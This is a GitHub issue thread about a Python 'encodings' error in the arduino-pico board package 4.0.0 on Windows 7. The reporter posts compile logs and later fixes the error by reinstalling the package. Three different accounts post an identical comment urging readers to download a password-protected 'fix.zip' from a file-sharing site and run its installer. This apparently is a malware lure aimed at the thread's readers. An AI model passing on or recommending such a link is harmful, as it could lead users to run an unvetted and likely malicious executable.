earlephilhower/arduino-pico #2357: ModuleNotFoundError: No module named 'encodings', after updating to 4.0.0 via the Board manager in Arduino 1.8.19 in Windows 7

Andy2No, 2024-08-26:
This may turn out to be limited to Windows 7 Arduino 1.x users, and there probably aren't many of them, but I'm so far not able to use 4.0.0 after updating via the Boards manager, in Arduino 1.8.19, in Windows 7.

Compiling a new, empty sketch, for the Raspberry Pi Pico RP2040, gives this error:

```
Fatal Python error: initfsencoding: unable to load the file system codec
ModuleNotFoundError: No module named 'encodings'
```

The full compilation log was:

```
C:\Program Files (x86)\Arduino-1-8-19\arduino-builder -dump-prefs -logger=machine -hardware C:\Program Files (x86)\Arduino-1-8-19\hardware -hardware C:\Users\andy\AppData\Local\Arduino15\packages -hardware D:\Documents\Arduino\hardware -tools C:\Program Files (x86)\Arduino-1-8-19\tools-builder -tools C:\Program Files (x86)\Arduino-1-8-19\hardware\tools\avr -tools C:\Users\andy\AppData\Local\Arduino15\packages -built-in-libraries C:\Program Files (x86)\Arduino-1-8-19\libraries -libraries D:\Documents\Arduino\libraries -fqbn=rp2040:rp2040:rpipico:flash=2097152_0,freq=133,opt=Small,rtti=Disabled,stackprotect=Disabled,exceptions=Disabled,dbgport=Disabled,dbglvl=None,usbstack=picosdk,ipbtstack=ipv4only,uploadmethod=default -ide-version=10819 -build-path C:\arduino-output -warnings=none -build-cache C:\Users\andy\AppData\Local\Temp\arduino_cache_547419 -prefs=build.warn_data_percentage=75 -prefs=runtime.tools.pqt-mklittlefs.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-mklittlefs\2.2.0-d04e724 -prefs=runtime.tools.pqt-mklittlefs-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-mklittlefs\2.2.0-d04e724 -prefs=runtime.tools.pqt-gcc.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-gcc\2.2.0-d04e724 -prefs=runtime.tools.pqt-gcc-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-gcc\2.2.0-d04e724 -prefs=runtime.tools.pqt-python3.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-python3\1.0.1-base-3a57aed -prefs=runtime.tools.pqt-python3-1.0.1-base-3a57aed.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-python3\1.0.1-base-3a57aed -prefs=runtime.tools.pqt-picotool.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-picotool\2.2.0-d04e724 -prefs=runtime.tools.pqt-picotool-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-picotool\2.2.0-d04e724 -prefs=runtime.tools.pqt-openocd.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-openocd\2.2.0-d04e724 -prefs=runtime.tools.pqt-openocd-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-openocd\2.2.0-d04e724 -prefs=runtime.tools.pqt-pioasm.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-pioasm\2.2.0-d04e724 -prefs=runtime.tools.pqt-pioasm-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-pioasm\2.2.0-d04e724 -verbose C:\Users\andy\AppData\Local\Temp\untitled1600765570.tmp\sketch_aug26a\sketch_aug26a.ino
C:\Program Files (x86)\Arduino-1-8-19\arduino-builder -compile -logger=machine -hardware C:\Program Files (x86)\Arduino-1-8-19\hardware -hardware C:\Users\andy\AppData\Local\Arduino15\packages -hardware D:\Documents\Arduino\hardware -tools C:\Program Files (x86)\Arduino-1-8-19\tools-builder -tools C:\Program Files (x86)\Arduino-1-8-19\hardware\tools\avr -tools C:\Users\andy\AppData\Local\Arduino15\packages -built-in-libraries C:\Program Files (x86)\Arduino-1-8-19\libraries -libraries D:\Documents\Arduino\libraries -fqbn=rp2040:rp2040:rpipico:flash=2097152_0,freq=133,opt=Small,rtti=Disabled,stackprotect=Disabled,exceptions=Disabled,dbgport=Disabled,dbglvl=None,usbstack=picosdk,ipbtstack=ipv4only,uploadmethod=default -ide-version=10819 -build-path C:\arduino-output -warnings=none -build-cache C:\Users\andy\AppData\Local\Temp\arduino_cache_547419 -prefs=build.warn_data_percentage=75 -prefs=runtime.tools.pqt-mklittlefs.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-mklittlefs\2.2.0-d04e724 -prefs=runtime.tools.pqt-mklittlefs-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-mklittlefs\2.2.0-d04e724 -prefs=runtime.tools.pqt-gcc.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-gcc\2.2.0-d04e724 -prefs=runtime.tools.pqt-gcc-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-gcc\2.2.0-d04e724 -prefs=runtime.tools.pqt-python3.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-python3\1.0.1-base-3a57aed -prefs=runtime.tools.pqt-python3-1.0.1-base-3a57aed.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-python3\1.0.1-base-3a57aed -prefs=runtime.tools.pqt-picotool.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-picotool\2.2.0-d04e724 -prefs=runtime.tools.pqt-picotool-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-picotool\2.2.0-d04e724 -prefs=runtime.tools.pqt-openocd.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-openocd\2.2.0-d04e724 -prefs=runtime.tools.pqt-openocd-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-openocd\2.2.0-d04e724 -prefs=runtime.tools.pqt-pioasm.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-pioasm\2.2.0-d04e724 -prefs=runtime.tools.pqt-pioasm-2.2.0-d04e724.path=C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-pioasm\2.2.0-d04e724 -verbose C:\Users\andy\AppData\Local\Temp\untitled1600765570.tmp\sketch_aug26a\sketch_aug26a.ino
Using board 'rpipico' from platform in folder: C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\hardware\rp2040\4.0.0
Using core 'rp2040' from platform in folder: C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\hardware\rp2040\4.0.0
Detecting libraries used...
"C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\tools\\pqt-gcc\\2.2.0-d04e724/bin/arm-none-eabi-g++" -I "C:\\arduino-output/core" -c -Werror=return-type -Wno-psabi -DUSBD_PID=0x000a -DUSBD_VID=0x2e8a -DUSBD_MAX_POWER_MA=250 "-DUSB_MANUFACTURER=\"Raspberry Pi\"" "-DUSB_PRODUCT=\"Pico\"" -DLWIP_IPV6=0 -DLWIP_IPV4=1 -DLWIP_IGMP=1 -DLWIP_CHECKSUM_CTRL_PER_NETIF=1 "-DARDUINO_VARIANT=\"rpipico\"" -DPICO_FLASH_SIZE_BYTES=2097152 "@C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/lib/rp2040/platform_def.txt" -march=armv6-m -mcpu=cortex-m0plus -mthumb -ffunction-sections -fdata-sections -fno-exceptions "-iprefixC:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/" "@C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/lib/rp2040/platform_inc.txt" "@C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/lib/core_inc.txt" "-IC:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/include" -fno-rtti -std=gnu++17 -g -pipe -w -x c++ -E -CC -DF_CPU=133000000L -DARDUINO=10819 -DARDUINO_RASPBERRY_PI_PICO "-DBOARD_NAME=\"RASPBERRY_PI_PICO\"" -DARDUINO_ARCH_RP2040 -Os -DWIFICC=CYW43_COUNTRY_WORLDWIDE "-IC:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0\\cores\\rp2040" "-IC:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0\\variants\\rpipico" "C:\\arduino-output\\sketch\\sketch_aug26a.ino.cpp" -o nul
Generating function prototypes...
"C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\tools\\pqt-gcc\\2.2.0-d04e724/bin/arm-none-eabi-g++" -I "C:\\arduino-output/core" -c -Werror=return-type -Wno-psabi -DUSBD_PID=0x000a -DUSBD_VID=0x2e8a -DUSBD_MAX_POWER_MA=250 "-DUSB_MANUFACTURER=\"Raspberry Pi\"" "-DUSB_PRODUCT=\"Pico\"" -DLWIP_IPV6=0 -DLWIP_IPV4=1 -DLWIP_IGMP=1 -DLWIP_CHECKSUM_CTRL_PER_NETIF=1 "-DARDUINO_VARIANT=\"rpipico\"" -DPICO_FLASH_SIZE_BYTES=2097152 "@C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/lib/rp2040/platform_def.txt" -march=armv6-m -mcpu=cortex-m0plus -mthumb -ffunction-sections -fdata-sections -fno-exceptions "-iprefixC:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/" "@C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/lib/rp2040/platform_inc.txt" "@C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\hardware\\rp2040\\4.0.0/lib/core_inc.txt" "-IC:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\ [... cut ...]
Python3 in Windows 7 is limited to 3.8.x, AFAIK (I have 3.8.6 running okay on it), so maybe it's just not possible to use arduino=pico 4.0.0 in Windows 7 and this doesn't affect Win 10+.

If I try to run the python3 that gets installed with arduino-pico from the Windows command line, I get this:

```
C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-python3\1.0.1-ba
se-3a57aed>python3.exe
Fatal Python error: initfsencoding: unable to load the file system codec
ModuleNotFoundError: No module named 'encodings'

Current thread 0x00001d60 (most recent call first):
```

and a little error dialog box pops up saying that Python3 has stopped working.

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

earlephilhower, 2024-08-26:
That's the IDE which has improperly installed Python.  Youll need to remove the core and reinstall from the Boards Manager.

closed 2024-08-26 by earlephilhower

Andy2No, 2024-08-26:
I've now uninstalled 4.0.0 using the Boards manager, then used it to install 4.0.1.  Compiling the empty sketch now gives a different error:

```
exec: "C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\tools\\pqt-python3\\1.0.1-base-3a57aed/python3": file does not exist
Error compiling for board Raspberry Pi Pico.
```

I'll try using the github method, later.  I appreciate the Boards manager can be problematic and I'm not dependent on it, it just occurs to me that other people will probably try to use it and hit the same problem - though maybe only in limited circumstances.

earlephilhower, 2024-08-26:
There's not much I can do about the IDE not actually unzipping a file, unfortunately.  You can try uninstalling one more time, logging out of Windows, logging back in, and reinstalling.  That way there should be nothing in the IDE left over to cause issues on the reinstall.

Andy2No, 2024-08-26:
I've verified that it's right - the file doesn't exist.  There's nothing in that folder:

```
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\andy>cd C:\\Users\\andy\\AppData\\Local\\Arduino15\\packages\\rp2040\\t
ools\\pqt-python3\\1.0.1-base-3a57aed/

C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-python3\1.0.1-ba
se-3a57aed>dir
 Volume in drive C is Tosh_3as2TB
 Volume Serial Number is 6DCF-1A92

 Directory of C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-py
thon3\1.0.1-base-3a57aed

2024-08-26  06:16    <DIR>          .
2024-08-26  06:16    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)  862,728,859,648 bytes free

C:\Users\andy\AppData\Local\Arduino15\packages\rp2040\tools\pqt-python3\1.0.1-ba
se-3a57aed>
```

I see @FeuerSturm has suggested a manual fix in issue #2355 .  I can try that, or I'm fine with leaving it broken for a while, to see if there's a solution that people can use via the boards manager, without knowing how to do anything else.

Andy2No, 2024-08-26:
Sorry, I didn't see that last reply while I was composing mine.  No problem, I'll try it another way shortly.  Thanks for the information about the Python version.  That's promising.

Andy2No, 2024-08-26:
Okay.  @FeuerSturm 's suggestion worked, for me - I unsinstalled 4.0.1 from the boards manager, then deleted the rp2040 folder from C:\Users\andy\AppData\Local\Arduino15\packages, then installed 4.0.1 again, also from the boards manager.

It now compiles without errors and I verified it with a real example - an attempt at importing one of the aruino-playground VGA demos to Arduino (I don't have the hardware built to try it yet though).

FWIW, here's a partial comparison of compile sizes.  4.0.1 uses less space on the RP2040 than 3.9.5 did, for the same project:

```
 Raspberry Pi Pico [RP2040], arduino-pico 3.9.5:
 
 Sketch uses 55788 bytes (2%) of program storage space. Maximum is 2093056 bytes.
Global variables use 29544 bytes (11%) of dynamic memory, leaving 232600 bytes for local variables. Maximum is 262144 bytes.

 Raspberry Pi Pico [RP2040], arduino-pico 4.0.1:

Sketch uses 54444 bytes (2%) of program storage space. Maximum is 2093056 bytes.
Global variables use 28736 bytes (10%) of dynamic memory, leaving 233408 bytes for local variables. Maximum is 262144 bytes.

 Raspberry Pi Pico 2 [RP2350], arduino-pico 4.0.1:

Sketch uses 53576 bytes (1%) of program storage space. Maximum is 4186112 bytes.
Global variables use 29404 bytes (5%) of dynamic memory, leaving 494884 bytes for local variables. Maximum is 524288 bytes.
```